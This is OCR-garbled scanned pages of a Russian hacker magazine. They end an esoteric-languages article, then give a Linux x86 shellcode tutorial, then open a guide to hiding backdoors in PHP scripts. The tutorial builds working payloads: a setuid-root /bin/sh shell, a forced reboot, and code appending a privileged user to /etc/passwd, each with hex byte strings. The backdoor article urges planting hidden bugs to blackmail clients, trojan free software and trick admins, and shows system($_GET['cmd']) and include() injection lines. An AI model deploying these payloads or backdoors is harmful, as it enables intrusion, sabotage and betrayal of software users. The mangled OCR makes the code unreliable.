элемента, которых, как оказывается, вполне 
хватает для счастливой жизни кодера-эзоте- 
рика. Это: 



Уу-к. 

Уу-к? 

Уу-к! 

Есть здоровый массив целых и указатель на 
текущую ячейку в нем. А также есть способ 
перемещаться по этому массиву, инкремен- 
тить элементы, выводить их на экран и полу- 
чать данные из ЗТОІІМ. И все это — с помощью 
трех разных уу-к'ов. Смотри, как все легко: 

Уу-к. Уу-к? — сдвигает указатель на текущую 
ячейку вперед. 

Уу-к? Уу-к. — сдвигает указатель на текущую 
ячейку назад. 

Уу-к. Уу-к. — увеличивает текущую ячейку 
на единичку. 

Уу-к! Уу-к! — уменьшает текущую ячейку 
на единичку. 

Уу-к. Уу-к! — читает символ (в А8СІ1) 
со ЗТОІІМ и кладет его текущую ячейку. 

Уу-к! Уу-к. — печатает символ, находящийся 
в текущей ячейке. 

Уу-к! Уу-к? — перемещается до ближайшего 
«Уу-к? Уу-к!», если значение в текущей 



ячейке равно нулю. 

Уу-к? Уу-к! — перемещается до ближайшего 
«Уу-к! Уу-к?», если значение в текущей ячей- 
ке не равно нулю. 

Вполне реально написать НеІІо, ѴѴогІсІ! , толь- 
ко немного геморройно. Этот прелестный 
язык построен на базе еще более понятного 
в плане синтаксиса ВгаіпЕиск’а. В ВЕ вмес- 
то уу-к’ов используются знаки препинания и 
спецсимволы, полностью оправдывающие 
название языка. Смотри Пт №о://езо1егіс. запое. 
ІІ/ЬгаіпІиск/Ы-зоигсе/згс-Ы/ІтѳІІо.Ь): 

>+++++++++[<++++++++>-]<.>+++++++[<++++>- 
]<+.+++++++..+++.[-]>++++++++[<++++>-] 
<.#>+++++++++++[<+++++>-]<. >++++++++[<+++>- 

]<.+++. -.[-]>++++++++[ 

<++++>-]<+.[-]++++++++++. 

Для брэйнфака написано миллион и компи- 
ляторов, и интерпретаторов (а также конвер- 
тер в язык библиотекаря), так что можешь 
браться за его изучение — пригодится, 
обещаю. Мне особенно понравился факт 



146 



ХАКЕР 03 /87/ 06 







существования интерпретатора брэйнфака на самом брэйнфа- 
ке. Будь я автором каких-нибудь ѴМ-протекторов, обязатель- 
но бы задействовал бы в качестве языка виртуальной машины 
ВР ;). Наверное, потому и не автор. 

Чтобы было попроще во всем разобраться, держи таблицу соот- 
ветствия языка программирования на базе у-ук'ов, брэйнфака и 
моего любимого Си. 



О брэйнфаке читай там: 
ѵѵѵѵѵѵ.тиореГІаЬз.сот/~ЬгеабЬох/Ы/ 

Об ѵѵ-к~ах тут: 

ѵѵѵѵѵѵ.сІапаегтоизе.пеГ/езоІегіс/оок.ИІтІ 

О Т. Пратчетте вот здесь: 
ѵѵѵуѵу.ргаІсИеН.іпТо 



Уу-к. Уу-к? 


> 


++р; 


Уу-к? Уу-к. 


< 


--р; 


Уу-к. Уу-к. 


+ 


++*р; 


Уу-к! Уу-к! 


- 


~*р; 


Уу-к. Уу-к! 




ри(с(іаг(*р); 


Уу-к! Уу-к. 


, 


*р = деіс(іаг() 


Уу-к! Уу-к? 


[ 


и/РІІѳ (*р) I 


Уу-к? Уу-к! 


] 


} 



Ну и, наконец, офигительнейший обзор эзо- 
терических языков программирования 
вон там: 

ѵѵѵѵѵѵ.гзсіп.ги/агіісіе/рітііозорііѵ/іапаиаавз.хті 



Надеюсь, ничего не напутал. 



ВШАПѴ ѴОШѴ5 ЗС 
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кодинг 




ТЕХТ ОХВЕЕВОПІЫК2 & ИЗ 

/ ОХВЕЕПОЯШК2@МАІІ_.ІШ / 



Черная магия для 
начинающих 

Создание шелл-кода для І_іпих/х86 в примерах 




Главное в шелл-коде, помимо знаний, — практика и фантазия. После того 
как ты научишься писать простые вызовы, ты сможешь приступить к реа- 
лизации программ посложнее. Например, следующим шагом я порекомен- 
довал бы тебе написать шелл-код, который биндит порт или любой другой 
сетевой шелл-код. Помни, что все приходит с опытом. 



НАВЕРНЯКА, ПРОСМАТРИВАЯ ИСХОД- 
НИКИ ЭКСПЛОЙТОВ, ТЫ НЕ РАЗ 
ЗАДУМЫВАЛСЯ НАД МАГИЧЕСКИМИ 
ПОСЛЕДОВАТЕЛЬНОСТЯМИ БУКОВОК 
И ЦИФЕРОК, КОТОРЫЕ ЗАКЛЮЧЕНЫ 
В ДВОЙНЫЕ КАВЫЧКИ. НАЗВАНИЕ 
У НИХ У ВСЕХ ОДНО — ШЕЛЛ-КОД. 

ДА, ТОТ САМЫЙ КОД, БЕЗ КОТОРО- 
ГО И ХАКЕР — НЕ ХАКЕР, И УЯЗВИ- 
МОСТЬ — ВСЕГО ЛИШЬ ВОЗМОЖ- 
НОСТЬ ЭЭОЗ’А. В ЭТОЙ СТАТЬЕ Я 
ПОПЫТАЮСЬ ОБЪЯСНИТЬ НА ПРИ- 
МЕРЕ ОС ЫШХ ПОД ПРОЦЕССОР 
АРХИТЕКТУРЫ Х86, КАКИМ ОБРАЗОМ 
СОЗДАЮТСЯ ЭТИ ВОЛШЕБНЫЕ ПОС- 
ЛЕДОВАТЕЛЬНОСТИ ДЛЯ *ШХ-СИС- 
ТЕМ, ДЕЛАЮЩИЕ ЖИЗНЬ ХАКЕРА 
ЯРКОЙ И УВЛЕКАТЕЛЬНОЙ. 




ЗЬеІІсосіе — это определенная последова- 
тельность байт-кода, запускающая ту или 
иную функцию для данной системы. Вовсе 
необязательно, что шелл-код должен огра- 
ничиваться запуском оболочки системы, его 
можно научить делать все, что угодно — воз- 
можности здесь зависят только от вообра- 
жения и опытности автора. 

Обычно шелл-код пишется на ассемб- 
лере, что само по себе не всегда легко 
для новичка, но я постараюсь дать точ- 
ные определения, чтобы даже новичку, 
никогда не видевшему машинного языка, 
было понятно, как написать простей- 
ший шелл-код и использовать его в своих 
мирных целях. 

ВЫЗОВ ФУНКЦИИ 

Прежде чем писать шелл-код, надо разо- 
браться, как вызвать в 1_іпых ту или иную 



системную функцию. Если в ѴѴІпбоѵѵв для 
этого нужно мучительно долго искать мил- 
лион разных адресов, то здесь все совсем 
просто. Вызов любой системной функции 
делается в три этапа: 

1 . В регистр ЕАХ кладется номер системного 
вызова. 

2. В остальные регистры кладутся парамет- 
ры слева направо. 

3. Вызывается системное прерывание 806. 

И никакого геморроя с адресами, как в 
винде. 

Давай напишем для начала простенький 
вызов, который ничего, кроме как выхода из 
программы, не делает. Чтобы узнать, какой 
для этого надо номер класть в регистр ЕАХ, 
просто заглянем в /изг/іпсіибе/азт/ипізісі ./? . 
В этом файле находятся все номера сис- 



темных вызовов. Без проблем откапываем 
в нем номер, но вот незадача: одного его 
для вызова будет мало. Нам нужно знать, 
что класть в остальные регистры, то есть 
какие у вызова параметры. Чтобы ответить 
на этот вопрос, следует воспользоваться 
замечательной никсовой командой — тап. 
Передай ей аргумент «2» и имя нужного 
вызова, чтобы посмотреть полное описание 
вызова: 

Ьа$іі-2.05Ь# тап 2 ехіі 

Мы видим, что функция ехіі требует всего 1 
параметр типа іпі. Это код выхода. Здорово, 
теперь имеем право написать код: 

Ьа$Іі-2.05Ь# саі ехіі.азт 
тоѵ еах,1 
іпі 80І1 
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ДЖЕНТЛЬМЕНСКИЙ 

НАБОР 



ды этого регистра. 

Давай приведем по этому принци- 
пу наш ехіі-шелл-код к нормально- 
му виду: 

базб-2.056# саі ехіі.азт 
хог еах.еах 
тоѵ аІ,1 
іпі 80И 

В этом коде мы сначала очистили 
ЕАХ, а затем засунули номер сис- 
темного вызова в АІ_ и вызвали пре- 
рывание. 



Для осуществления всего описанного 
в статье тебе потребуются: 

1 . Ііпих — тачка с установленным на нее 

ПИНГВИНОМ 

2. NА8М (Ь«р:// 8 оигсеГог§ел 1 е 1 :/ 
рго]есі:5/па8т) — ассемблер с ннтелов- 
ским синтаксисом 

3. ЬВ — стандартный линковщик 

4. ОЬ)сІитр — утилита для просмотра 
байт-кода 

5 . 5иасе — утилита для просмотра вызовов 

Это есть в каждом доме, поэтому достать 
все необходимое — не проблема 



Здесь мы помещаем в регистр ЕАХ номер 
системного вызова и делаем вызов. Вот и 
весь код ехіі (вообще, насколько я понял, 
надо было бы еще и еЬх обнулить на всякий 
случай, чтобы в коде выхода случайного зна- 
чения не оказалось. — Прим. ред.). Теперь 
откомпилируем: 

ЬазІт-2.05Ь# па$т -ІеІІ ехіі.азт -о ехіі.о 
базб-2.056# И ехіі.о -о ехіі 
1(1: ѵѵагпіпд: саппоі ТіпсІ епігу зутбоі _5ІагІ; беіаиіііпд 
Іо 0000000008048080 

Вылетает один ворнинг, который говорит, 
что не определен _зІаП, но, несмотря на это, 
вое откомпилировалось и скомпоновалось 
правильно. Теперь запустим: 

ЬазТі-2.05Ь# ./ехіі 
базб-2.056# 

Программа вышла корректно, а чтобы в этом 
убедиться, есть специальная и очень 
полезная тулза — зігасе. Этой проге надо 
указать параметр имени исследуемой 
программы: 

ЬазТі-2.05Ь# зігасе ./ехіі 
ехесѵе("./ехіі", ["./ехіі"], [/* 45 ѵагз */]) = 0 
_ехі1(0) = ? 
базб-2.056# 

Мы видим, что произошло все так, как мы и 
планировали. 

Теперь, убедившись, что программа, напи- 
санная нами, действует верно, превратим 
ее в набор байтов кода, то есть в специфи- 
ческий шелл-код. Воспользуемся утилитой 
оЬ]с!иглр с флагом -б: 

базб-2.056# оЬісіитр -гі ехіі 
ехіі: формат файла еІ(32-і386 
Дизассемблирование раздела .іехі: 

08048080 с.ІехЬ: 

8048080: 68 01 00 00 00 тоѵ $0x1 ,%еах 
8048085: сб 80 іпі $0x80 

Ьаз(і-2.05Ь# 

Вот мы и получили нашу первую магическую 
последовательность. Но здесь есть одно 
маленькое «НО». В нашем шелл-коде при- 
сутствуют нулевые байты, а их не должно 
быть, так как в языке Си при копировании 
символов этот знак (00) означает конец стро- 
ки. Есть огромная вероятность (100%), что 
наш шелл-код окажется бесполезным, да и 
размер с нулями увеличивается, а размер, 
как известно, имеет значение. Как же изба- 
виться от нулей? 

Это легкая задача. Для того чтобы запих- 
нуть номер системного вызова в регистр 
и при этом не спровоцировать появление 
нулей, нужно сначала проксорить регистр, 
а потом впихнуть данные в младшие разря- 



базб-2.056# пазт -ІеІІ ехіі.азт -о ехіі.о 

базб-2.056# 16 ехіі.о -о ехіі 

16: ѵѵагпіпд: саппоі (іпб епігу зутЬоі _зІагІ; беіаиіііпд 

Іо 0000000008048080 

базб-2.056# ./ехіі базб-2.056# 

базб-2.056# зігасе ./ехіі 

ехесѵе("./ехіІ", ["./ехіі"], [/* 45 ѵагз */]) = 0 

_ехіі(0) = ? 

базб-2.056# 

Проверили, что все прекрасно работает. 
Теперь сдампим ее код: 

базб-2.056# оЬ|битр -б ехіі 

ехіі: формат файла еІ132-і386 

Диассемблирование раздела .Іехі: 

08048080 <.ІехІ>: 



8048080: 31 с0 


ХОГ 


%еах,%еах 


8048082: 60 01 


тоѵ 


$0x1 ,%аІ 


8048084: сб 80 


іпі 


$0x80 


ЬазІі-2.05Ь# 






И вправду, теперь 


в нашем 


байт-коде 



нулей, да и размер уменьшился, что не может 
не радовать. Кстати, можно вместо некраси- 
вого тоѵ аі, 1 использовать іпс аі (на один 
байт меньше. — Прим, ред), что будет лучше 
с эстетической точки зрения. Да и вместо 
хог всегда можно использовать зиЬ, но здесь 
уже кому как нравится. Экспиримента ради 
рассмотрим еще один несложный пример 
шелл-кода: 

базб-2.056# саі раизе.азт 
хог еах.еах 
тоѵ аі,29 
іпі 80 І 1 

Очищаем ЕАХ, затем кладем в АІ_ номер сис- 
темного вызова и вызываем прерывание. 
Компилим, зігас’им и получаем байт-код: 

5ТКАСЕ: 

ехесѵе("./раизе", ["./раизе"], [/* 45 ѵагз */]) = 0 
раизе( кипііпізііеб ...> 

ВСОРЕ: 



8048080: 


31 СО 


ХОГ 


%еах,%еах 


8048082: 


601 б 


тоѵ 


$0x16, %аІ 


8048084: 


сб 80 


іпі 


$0x80 



Этот шелл-код вызывает системную функ- 
цию раизе. Которая будет ждать, когда же 
ты нажмешь <СТРІ_+С>. Здорово, да? А ведь 
это могла бы быть и какая-нибудь не такая 
безобидная функция. 

І.ЕѴЕ1. 1ІР: НЕВООТ 

Сейчас мы с тобой напишем магический 
ребут, который в мгновенье ока перезапус- 
тит твою ось с потерей всех несохраненных 
данных. Сейчас объясню почему. Во-первых, 
ты же не собираешься сохранять какие-то 
неважные темповые данные на серваке, 
который является твоей целью ;). Во-вторых, 
чтобы данные сохранились, нужно добавить 
пару лишних вызовов(зуп() зуп()), что ска- 
жется на размере шелл-кода. Чтобы просто 
перезапустить тачку, существует специаль- 
ный и универсальный вызов гебооі. В зави- 
симости от переданных ему параметров он 
использует тот или иной метод перезагрузки . 
Например, чтобы просто и без лишних воп- 
росов и восклицаний перезапустить машину 
в регистры ЕВХ, ЕСХ и ЕОХ, надо положить 
такие параметры: первое магическое слово, 
второе магическое слово, специальный 
флаг. Я не шучу, на самом деле в Мануэле 
написано про два магических слова, кото- 
рые должны присутствовать в первых двух 
параметрах. А в третьем должен лежать 
специальных флаг типа іпіедег, который по 
существу и определяет, как будет действо- 
вать наш гебооі: просто перезагружаться, 
ничего не делать и выводить сообщение 
типа зузіет біаііесі или же вырубать комп. 
Случай первый: 



ХОГ 


еах.еах 


тоѵ 


ебх.хіееібеаб 


тоѵ 


ѳсх, 672274/93 


тоѵ 


ебх, 0x1234567 


тоѵ 


аІ,88 


іпі 


806 



Сначала идет стандартная очистка регистра 
ЕАХ, затем в регистры ЕВХ и ЕСХ кладутся маги- 
ческие числа, а в ЕВХ — специальный флаг. 

Вот такой простой код и вот такой шелл-код: 
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кодинг 



РЕГИСТРЫ ОБЩЕГО 
НАЗНАЧЕНИЯ 



Для того чтобы более или менее связно 
программировать на ассемблере, хватает 
всего четырех регистров общего назна- 
чения: ЕАХ, ЕВХ, ЕСХ, ЕЭХ. Это 32- 
разрядные регистры, то есть в них может 
содержаться аж 4 байта. Если нужно 
использовать не все 32 разряда регист- 
ра, а, скажем, 16 или 8, то используются 
такие регистры: АХ, ВХ, СХ и ЭХ (16- 
разрядные, без префикса «Е»), а также 
их половинки: АН, АЬ, ВН и т.п. 



32 Ьіі 


16 ЬІІ 


8 Ьіі (Ь) 


8 ЬІІ (1) 


ЕАХ 


АХ 


АН 


АІ_ 


ЕВХ 


ВХ 


ВН 


ВІ_ 


ЕСХ 


СХ 


СН 


СБ 


ЕОХ 


ОХ 


ОН 


0І_ 



"\х31\хсО\хЬЬ\ха(і\х(іе\хе1\хіе" 

"\хЬ9\х69\х1 9\х1 2\х28\хЬа\х67“ 
"\х45\х23\х01\хЬ0\х58\хссі\х80" 

Размером он хоть и невелик (21 байт), но зато 
какая убойная сила! Если ты посмотришь в 
тал, то увидишь, какие еще значения флага 
можно передавать этому вызову. Если возник- 
нет желание попрактиковаться, то можешь 
написать, к примеру, выключалку для компа. 

ОѴѴЫЕО ВѴ МЕ! 

Не будем уподобляться начинающим програм- 
мистам в написании НеІІо ѵѵогісі, напишем лучше 
ОѵѵпесІ Ву Ме! :). Для начала нам необходимо 
узнать, какой системный вызов выводит строку. 
Заглянув в ипізісі.іі, можно легко встретить фун- 
кцию ѵѵгііе, — наверняка это то, что нам нужно. 
Запомнили ее номер — 4, теперь заглянем в 
тап 2 ѵѵгііе и увидим, что функция требует три 
параметра: дескриптор вывода, указатель на 
данные и размер данных, то есть ЕВХ, ЕСХ 
и ЕОХ. В ЕАХ же у нас должен лежать номер 
вызова — 4. 

Если все это переварить и использовать в 
своей программе, то может получиться сле- 
дующий код: 



ссід 




ризіі 


еЬх 


ризіі 


еах 


рор 


еЬх 


ризіі 


Ме! 


ризіі 


сі Ву' 


ризіі 


Оіл/пе 


тоѵ 


есх.езр 


іпс 


Ы 


тоѵ 


аі.4 


тоѵ 


Ы,12 


іпі 


.С 

О 

СО 


хог 


еах, еах 


іпс 


а! 


іпі 


.с 

о 

со 



Первой командой мы обнуляем ЕОХ, а последу- 
ющими четырьмя — ЕАХ и ЕВХ. Далее кладем 



строку в стек (задом наперед по 4 байта) и все 
это заталкиваем в ЕСХ (второй параметр ѵѵгііе). 
Увеличиваем ВІ_ на единицу, так как это первый 
параметр (1 = вывести на стандартный поток 
вывода), в АБ кладем номер системного вызова 
ѵѵгііе, в Об — длину нашей строки и даем ядру 
контроль, а потом ехіі. Если его не будет, то 
код выполнится, но появится сообщение вроде 
Зедтепіаііоп РаиІІ, что нежелательно. 

При обждампе получается такой шелл-код: 

"\х99\х52\х58\х50\х5Ь" 

'\х68\х20\х4сІ\х65\х21 " 

"\хб8\х64\х20\х42\х79" 

"\х68\х30\х77\х6е\х65" 

"\х89\хе1\х(е\хсЗ" 

"\хЬ0\х04\хЬ2\х0сІ" 

'\хссІ\х80\х31\хс0" 

"\х!е\хс0\хсс1\х80" 

36 байт... Это относительно немного для шелл- 
кода. Тот же код можно переписать по-друго- 
му, отличающимся способом хранения данных 
(не всегда удобно строку в стек загонять): 



ітр 


зЬогІ Ьаі 


таіп: 




рор 


есх 


сЬч 




ризіі 


еЬх 


рор 


еах 


ризЬ 


еах 


рор 


еЬх 


іпс 


Ы 


тоѵ 


аі.4 


тоѵ 


(11,13 


іпі 


со 

о 

СО" 


хог 


еах, еах 


іпс 


аі 


іпі 


80іі 


Ьаі: 




саіі 


таіп 


сІЬ 


'ОѵѵпесІ Ву Ме!',0ха 



В первой строке прыгаем в область под мет- 
кой баі, из нее вызываем метку таіп. Таким 
образом, у нас в стеке сохраняется адрес 
нашей строки (ведь инструкция саіі кладет в 
стек адрес следующей за ней инструкции). 
Из главной функции снимаем значение со 
стека и кладем, как второй параметр вызова 
ѵѵгііе. Далее идет уже описанный мною код. 
Выходит такой код (4 байта больше за счет 
вызовов ]тр и саіі): 

'\хеЬ\х1 4\х59\х99\х52\х58\х50\х5Ь" 

'\хІе\хсЗ\хЬ0\х04\хЬ2\х0сГ 

'\хссІ\х80\х31\хс0\х(е\хс0" 

■\хссІ\х80\хе8\хе7\х(1\х1(\х1(" 

■\х30\х77\х6е\х65\х64\х20\х42\х79" 

"\х20\х4сІ\хб5\х2 1 \хОа" 

Теперь, когда ты уже умеешь писать что- 
то типа ОѵѵпесІ Ву Ме!, пора переходить к 
наиболее частому и практичному примене- 
нию шелл-кода. 



ДЕЛАЕМ ЕХЕСѴЕ 

Для того чтобы запустить определенную 
программу, в никсах служит функция ехесѵе, 
в ЕАХ для ее вызова надо класть 1 1 или ОхЬ. 
У ехесѵе три параметра: указатель на имя 
вызываемой программы, указатель на имя 
вызываемой программы и аргументы, указа- 
тель на епѵ (на епѵ, пожалуй, забьем). 

Ну что ж, приступим! 

сЬд 

ризИ еЬх 
рор еах 
ризіі еах 
ризіт п/зІѴ 
ризіі У/Ы’ 
тоѵ еЬх.езр 
ризіі еах 
ризіі еЬх 
тоѵ есх.езр 
тоѵ аІ.ОхЬ 
іпі 801і 

В этом коде мы сначала обнуляем регистры 
ЕЭХ и ЕАХ, затем кладем в стек имя вызывае- 
мой нами программы и ноль как завершающий 
символ. Потом мы снимаем со стека значение и 
кладем как первый параметр. Следующим эта- 
пом мы кладем в стек второй параметр и ноль, 
то есть получаем как бы своеобразный массив, 
и запихиваем все это дело в ЕСХ (второй пара- 
метр). И кладем номер системного вызова в АІ_ 
и делаем вызов. Этот несложный ассемблер- 
ный код превращается в такой шелл-код: 

\х99\х52\х58\х50" 

\х68\х6е\х21\х73\х68" 

\х68\х2(\х21\х62\х69" 

! \х89\хе3\х50\х53\х89" 

"\хе1\хЬ0\х0Ь\хссІ\х80" 

Байт-код достаточно короткий — 24 байта. 
Это вполне приемлемо для шелл-кода. 

Он не требует вызова ехіі, так как во время 
выполнения кода управление передается на/ 
Ып/зЬ. Для того чтобы шелл-код был по-насто- 
ящему эффективным, к нему надо приплюсо- 
вать зе!иісІ(). Зеіиісі — системный вызов, кото- 
рый устанавливает уид текущего пользовате- 
ля науид, переданный в параметре вызова: 

хог еах, еах 
хог еЬх.еЬх 
тоѵ аІ,0х1 7 
іпі 801і 
сйч 

ризіі еах 
ризіі п/зІГ 
ризіі У/Ы’ 
ризіі езр 
рор еЬх 
ризіі еах 
ризіг еЬх 
ризіі езр 
рор есх 
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присутствует точка, это 
сделано для того, чтобы в 
шелл-коде не было нуля. 

Далее по коду этот лиш- 
ний символ меняется на 
ноль, чтобы системные 
вызовы увидели конец 
строки. 

Потом мы запихиваем 
первый параметр вызо- 
ва ореп в ЕВХ, а второй 
параметр — в ЕСХ (0x441 
посмотри насчет спе- 
цификации параметра), 
а в А1_ у нас идет номер 
системного вызова — 5. 

После чего мы вызываем 
іп( 806і. 

Далее по курсу у нас 
второй вызов, с парамет- 
рами которого ты уже и 
сам можешь разобрать- 
ся. Но сначала мы поме- 
щаем в ЕВХ содержимое 
регистра ЕАХ, так как 
при вызове ореп пара- 
метр сохраняется в ЕАХ, 
а он нам нужен в ЕВХ 
для следующего вызова. 

Мы затираем ненужный 
символ, но уже знаком 
переноса строки. Кладем 
стандартные параметры, 
которые я уже объяснял 
тебе в примере про ѵѵгііе, 
и вызываем прерыва- 
ние. Следующий вызов 
— сіозе, который требу- 
ет всего одного парамет- 
ра — дескриптора файла (ЕВХ). И, наконец, 
ехіі с кодом выхода 0. 

Надеюсь, ты уже набрал и сдампил шелл- 
код, здесь я его приводить не стану. Размер, 
конечно, не из маленьких, так как в шелл- 
коде содержатся довольно здоровые строки, 
но в целом он нормально оптимизирован. 



ѵѵѵѵѵѵ.тіІѵѵОгт.сот — примеры 
шелл-кодов под разные платформы 

уѵѵѵѵѵ.зНеІІсосІе.ога — немного 
документированных шелл-кодов 

ѵѵѵѵѵѵ.ІОіЗк.ога — очень много 
инфы по разработке шелл-кода 



іпі (*1)() = (іпі (*)())зс; 

< 0 ; 

) 

Компилируй, запускай, и если все в порядке, 
то программа передаст управление на наш 
шелл-код в памяти. 




ОСНОВНЫЕ ИСПОЛЬЗУЕМЫЕ 
НАМИ ИНСТРУКЦИИ АССЕМБЛЕРА 



В процессе разработки шелл-кода мы будем пользо- 


ваться не самым 


широким набором команд ассемблера. 


Бот все, что нам 


[ потребуется: 


инструкция 


значение 


тоѵ сізі.згс 


помещает значение зге в сізі 


асісі сізі.згс 


добавляет значение к сізі зге 


зиб сізі.згс 


вычитает значение зге из сізі 


ризіі зге 


помещает зоигсе наверх стека 


рор СІ5І 


помещает в сіезі вершину стека 


пс гед 


увеличивает (++) регистр 


сіес гед 


обратная инкременту операция (--) 


Іеа сізі.згс 


загрузить адрес зге в бзі 


хсіід сізі.зсг 


поменять сізі и зге значениями 


хог гед, гед 


ксорит регистр гед 


іпі пит 


вызов прерывания под номером пит 



тоѵ аІ.ОхЬ 

іпі 806 

Этот код почти не отличается от предыдуще- 
го. Добавился только вызов в начале зеіиіб. 

"\х31\хс0\х31\хс!Ь\хЬ0\х17\хссІ\х80\х99\х50" 

"\х68\х6е\х2(\х73\х68\х68\х2і\х2(\х62\х69" 

"\х54\х5Ь\х50\х53\х54\х59\хЬ0\х0Ь\хс(і\х80"; 

30 байт — это неплохо. А теперь, думаю, 
пора приступить к написанию самого боль- 
шого нашего шелл-кода — изег_абсІ. 

І.ОСШ: СОР 

В этом шелл-коде нам придется работать 
сразу с четырьмя системными вызовами: 
ореп, ѵѵгііе, сіозе и ехіі. Первый вызов будет 
открывать файл паролей с определенны- 
ми параметрами (/еіс/раззѵѵсі), второй будет 
добавлять туда новую строчку, содержащую 
параметры нашего нового пользователя, тре- 
тий вызов будет закрывать файл и, наконец, 
четвертый вызов будет корректно выходить из 
программы. Вперед! 



ссія 




ризМ 


ебх 


рор 


еах 


ризіі 


еах 


рор 


есх 


ризіі 


'ЗИСІ. 


ризіі 


'/раз' 


ризіі 


Ѵеіс' 


тоѵ 


Ьуіе [езр+1 1 ],аІ 


тоѵ 


еЬх.езр 


тоѵ 


сх, 0x441 


тоѵ 


аІ,5 


іпі 


806 


тоѵ 


еЬх.еах 


ризіі 


УзМх 1 


ризіі 


'/Ьіп' 


ризіі 




ризіі 


:0:0' 


ризіі 


доб: 


тоѵ 


Ьуіе [езр+1 9], Оха 


тоѵ 


есх.езр 


тоѵ 


61,20 


тоѵ 


аІ,4 


іпі 


806 


тоѵ 


аі.6 


іпі 


806 


хог 


еЬх.еЬх 


іпс 


аі 


іпі 


806 



Теперь все в подробностях. В начале мы уже 
привычными инструкциями обнуляем наши 
любимые регистры и кладем имя редак- 
тируемого файла в стек. На конце имени 



ИСПЫТАНИЯ 

Чтобы проверить, как работают наши заме- 
чательные шелл-коды, достаточно написать 
на Си коротенькую программу, с помощью 
которой и проводить многочисленные испы- 
тания. Практически прообраз эксплойта: 

сііаг зс[]= 

"наш шелл-код" 

"находится здесь"; 

іпі таіп() 

{ 



ЕХІТ(О) 

Шелл-кодинг — это очень интересное и увле- 
кательное занятие, ты можешь полюбить его 
и возненавидеть в один момент. Если у тебя 
что-то не получается — не расстраивайся, 
а пиши мне на мыло, и я постараюсь тебе 
помочь. На этом все. Желаю тебе удачи в 
твоих экстремальных кодерских экспери- 
ментах. 

ВІНДКѴ ѴОІІН'5 зс 
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ТЕХТ ЕТО’О 





МЫ В ХАКЕРЕ ОЧЕНЬ МНОГО ПИШЕМ О ТОМ, КАК ИСКАТЬ ОШИБКИ В КОДЕ, УЧИМ 
ТЕБЯ ВСЯЧЕСКИ ЗАЩИЩАТЬ СВОИ ПРОГРАММЫ, ЧТОБЫ НИ ОДИН ХАКЕРЮГА И 
НА КИЛОМЕТР НЕ ПОДОШЕЛ БЫ. МОЖЕТ, ДЛЯ ТЕБЯ ЭТО ПОКАЖЕТСЯ СТРАННЫМ, 
НО ИНОГДА ВОЗНИКАЕТ НЕОБХОДИМОСТЬ СПЕЦИАЛЬНО ПРИДУМАТЬ ХИТРОУМ- 
НЫЙ БАГ В СВОЕЙ ПРОГРАММЕ, НАЙТИ КОТОРЫЙ БУДЕТ СЛОЖНО, А ПОЛЬЗО- 
ВАТЬСЯ ИМ — УДОБНО. СЕГОДНЯ Я НАУЧУ ТЕБЯ ДЕЛАТЬ ТАКИЕ ОШИБКИ. 
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На диске ты найдешь несколько зловредных 
примеров, упомянутую библиотеку тсгѵрі и ее 
описание. 




ЭТО ЕЩЕ ЗАЧЕМ? 

Действительно, для чего это может понадо- 
биться — сознательно делать в собственном 
коде ошибку? Наивный! Причин — уйма. 

* Контроль за заказчиком. Представь, что 
ты работаешь фриланс-кодером, и к тебе 
обратился неизвестный человек, заказав 
сложную систему. Ты ее написал, но опаса- 
ешься, что он тебя кинет прямо или косвен- 
но. В этом случае бесценная вещь — иметь 
механизм воздействия на заказчика после 
сдачи работы или каким-то способом конт- 
ролировать и оценивать жизнедеятельность 
твоего проекта. Если ты сделаешь грамот- 
ный бэкдор, то заказчик будет у тебя на 
крючке вечно: чуть что — и ты устроишь ему 
сладкую жизнь! 

* Т роянский проект. Прекрасная идея — напи- 
сать какую-то крутую систему и распростра- 
нять ее бесплатно. Если проект действитель- 
но хорош, то люди поустанавливают твои 
скрипты, а ты при помощи собственного бага 
сможешь их всех крепко поиметь. 



* Взлом конкретного проекта. Представь, что 
тебе надо получить доступ к какому-то проекту. 
В этом случае можно написать какой-то удоб- 
ный небольшой скрипт, с маленьким и изящ- 
ным багом внутри, заметить который будет 
непросто. После этого ты можешь при помощи 
социальной инженерии заставить админист- 
ратора проекта поставить этот скрипт себе 
на сервер — ну, скажем, заинтересовав его 
интересными возможностями твоего скрипта, 
просто уговорив протестить новое приложе- 
ние, или предложив «непробиваемую версию 
рЬрВВ, которую тестировали лучшие хакеры 
России и выжгли там все баги». 

Причин, по которым м/еЬ-программисту 
всегда полезно уметь вшить пару багов в 
свой проект, много. Сейчас настало время 
и тебе научиться это делать красиво и 
изящно. 

КРАСИВО И БЕЗОПАСНО 

Казалось бы, чего тут проще — сделать баг, 
оставить жука? Как ты, наверное, подумал, 
все решается одной из этих сторок: 



$у$Іет($_ѲЕТ[“ха_стсІ"]); 

# или: 

5у8(ет(“ес!іо $_йЕТ[‘ха_тзд'] I таіі хакер@хакер. 
ги”); 

# или: 

іпсЫе($_ѲЕТ[(ІІепате]); 

Однако подумай, что будет, если прос- 
то добавить эту строчку в твой скрипт из 
20 строк. Любой дошкольник уже секунд 
через 10 после того, как откроет сорец, 
скажет тебе, что ставить этот скрипт себе 
он не будет, а лучше пойдет поищет в гугле 
проекты, где установлен твой скрипт. Так 
что примеры выше — это из разряда «как 
делать не надо». 

И еще один момент. Очень важно, когда 
твой баг найдут, чтобы он не смотрелся как 
специально сделанный бэкдор, а был похож 
на ошибку. Ну или, по крайней мере, был 
запрятан так, чтобы найти его было пробле- 
матично. 

Впрочем, довольно уже вводной части, 
перейдем к непосредственным решениям. 
Сейчас я научу тебя, во-первых, вставлять 
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хитроумные бэкдоры в твои скрипты, а во- 
вторых, допускать наивные ошибки. Как ты 
скоро поймешь, чтобы делать ошибки, надо 
чуть-чуть соображать :). 

ОБЩИЕ ИДЕИ 

Первым делом надо продумать, где и каким 
образом мы будем размещать жуков. Их 
форма и содержание — отдельный разго- 
вор. Сейчас давай решим, в каком месте 
программы мы будем их прятать. Любая 
рЬр-система обычно состоит из множества 
файлов. Всегда есть несколько файлов о 
описанием классов или функций — такие 
сценарии просто инклудятся скриптами, в 
которых используются описанные классы 
и процедуры. Наших жуков лучше всего 
прятать внутри именно файлов с описани- 
ями функций, поскольку они, как правило, 
довольно здоровые, и отыскать вручную 
одну ядовитую строку — сложная штука. 
Будет круто, если нам удастся обойтись 
без «хакерских» словечек вроде «іпсіисіе» 
и «зузіет» :). Я думаю, лучше всего впи- 
сать в код программы не тупого жука вроде 
зузІет($_ѲЕТ[стс1]), а какую-то сложную 
для понимания логическую ошибку, кото- 
рую автоматическими средствами отыскать 
никак нельзя. Об этом мы тоже поговорим, 
но сперва рассмотрим идеи несколько 
иного толка. 

ОШИБКИ СРАВНЕНИЯ 

